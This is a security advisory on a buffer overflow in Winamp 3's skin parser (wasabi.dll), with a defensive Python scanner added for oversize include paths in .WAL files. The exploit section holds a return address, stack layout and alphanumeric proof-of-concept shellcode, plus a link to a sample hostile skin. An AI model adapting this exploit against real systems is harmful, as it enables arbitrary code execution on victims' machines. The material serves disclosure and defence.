COMMAND

    Winamp 3 XML parser buffer overflow vulnerability

SYSTEMS AFFECTED

    Winamp 3 1.0.0.488

PROBLEM

    Sunnis [annihilator@inet.hr] [http://www.ii-labs.tk] found :

    Winamp 3 skin files are *.WAL and are automatically opened by MSIE.
    They are actually ZIP files with an altered extension. They contain
    pictures and configuration files used by Wasabi (the Winamp skinning
    system). The Wasabi engine is implemented inside wasabi.dll and is
    designed to provide a very configurable, OS-independent system for
    building skinnable applications quickly and easily (that's the reason
    why wasabi.dll is 800K big).

    A buffer overflow inside wasabi.dll may occur if the
    <include file="PATH"/> tag is altered with an extremely huge value for
    the file PATH (btw, MAX_PATH on win32 is defined to be only 512B).
    This can allow the execution of arbitrary code inside the address
    space of Winamp. Wasabi filters most non-printable characters, but
    specially designed shellcode will still pass through.

    ======[ Exploit

    By writing an extremely long string of 'A' chars and setting the
    kernel-mode debugger to capture page faults, one can see that at the
    point of execution both EAX and EBX contain pointers to
    [OverwrittenEIP-4]. ESP is unusable since it points to some strange
    value. The Winamp3 exe (studio.exe) loads many system DLLs which
    contain some usable instructions:

        jmp eax
        jmp ebx
        call eax
        call ebx

    On Windows Me there is such an instruction at 0x736D2120 (we can't use
    some of Winamp's own modules since the ASCII representation of their
    imagebase is NOT considered valid (between 0x20 and 0x7F) by Wasabi
    and will trigger an error message).

    The stack would look like this:

        ['AAAAAAAAAAAA'...
         XXXX[OverwrittenEIP][shellcode]
         ^^^^-address contained inside EAX and EBX

    Sample proof of concept shellcode would look like this:

        ; ASCII opcode representation:
        jmp __skip              ; ë+
        db 0, 0
        dd 736D2120h            ; <- call eax
        db 25h dup ('A')        ; needed because of JMP
    __skip:
        mov eax, 39406567h      ; ¸ge@
        sub eax, 794c2421h      ; -!$Ly
        push eax                ; P
        pop ecx                 ; Y
        ; eax = bff44146 = USER32!MessageBoxA on winMe
        push 'aaaa'             ; haaaa
        pop eax                 ; X
        xor eax, 'aaaa'         ; 5aaa
        ; eax = 0
        push eax                ; P = NULL-terminator
        push "tiol"             ; hloit
        push "pxe "             ; h exp
        push "tpec"             ; hcept
        push "noc-"             ; h-con
        push "fo-f"             ; hf-of
        push "oorp"             ; hproo
        push " 3pm"             ; hmp3
        push "aniW"             ; hWina
        push esp                ; T
        pop edx                 ; Z
        ; edx = ptr to string
        push eax                ; P
        push eax                ; P
        push edx                ; R
        push eax                ; P
        push ebx                ; S = return address
        push eax                ; Q = user32!MessageBoxA (v. 4.90.3000)
        retn                    ; Ă

    Filtering chars doesn't provide any protection at all. Writing
    alphanumeric shellcode using specialized kits such as irx's ASC is
    even easier.

    You can try this one here:

        kamikaza.ffk.hr/advisory/default.wal

    It works on WinMe (4.90) only, but adaptation to other win32s is
    trivial.

SOLUTION

    ?
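    A defensive check for the condition the advisory describes, added here as
    an example and not part of the original advisory or of Winamp/Wasabi: it
    opens a .WAL archive in memory, walks every .xml member, and flags any
    <include file="..."/> whose path exceeds the 512-byte MAX_PATH figure the
    advisory quotes, also noting whether the path is purely printable ASCII
    (the range the advisory says Wasabi lets through). The skin.xml layout
    and the sample archives are constructed for the demo; the regex is
    deliberately tolerant of malformed XML, since a hostile skin need not
    parse cleanly.

```python
import io
import re
import zipfile

# Threshold taken from the advisory's own MAX_PATH figure (512 bytes);
# any include path longer than this is worth flagging before the skin
# ever reaches wasabi.dll.
MAX_PATH = 512

# Byte-level match so it works on malformed or non-UTF-8 skin files.
INCLUDE_RE = re.compile(rb'<include\s+file\s*=\s*"([^"]*)"', re.IGNORECASE)


def scan_xml(data: bytes, max_len: int = MAX_PATH):
    """Return [(path_length, is_printable_ascii), ...] for every
    <include file="..."/> whose path is longer than max_len."""
    findings = []
    for m in INCLUDE_RE.finditer(data):
        path = m.group(1)
        if len(path) > max_len:
            # 0x20..0x7E is the printable range the advisory says passes
            # the Wasabi filter; a non-printable byte is still oversize.
            printable = all(0x20 <= b < 0x7F for b in path)
            findings.append((len(path), printable))
    return findings


def scan_wal(wal_bytes: bytes, max_len: int = MAX_PATH):
    """Scan every .xml member of a .WAL (zip) archive.
    Returns {member_name: findings} for members with oversize includes;
    an empty dict means nothing was flagged."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(wal_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".xml"):
                continue
            findings = scan_xml(zf.read(info), max_len)
            if findings:
                report[info.filename] = findings
    return report


def build_sample_wal(include_path: bytes) -> bytes:
    """Construct an in-memory .WAL with one skin.xml holding a single
    include tag. Sample data only; the <skin> root is a placeholder,
    not the real Wasabi skin schema."""
    xml = (b'<?xml version="1.0"?>\n<skin>\n  <include file="'
           + include_path + b'"/>\n</skin>\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("skin.xml", xml)
    return buf.getvalue()


if __name__ == "__main__":
    benign = build_sample_wal(b"xml/colors.xml")
    hostile = build_sample_wal(b"A" * 2000)
    print("benign :", scan_wal(benign))   # {}
    print("hostile:", scan_wal(hostile))  # {'skin.xml': [(2000, True)]}
```

    The check is intentionally a length gate on the attribute value rather
    than a signature for any particular payload: the advisory's point is
    that character filtering does not help, so the only robust pre-filter
    is refusing paths that could never be valid in the first place.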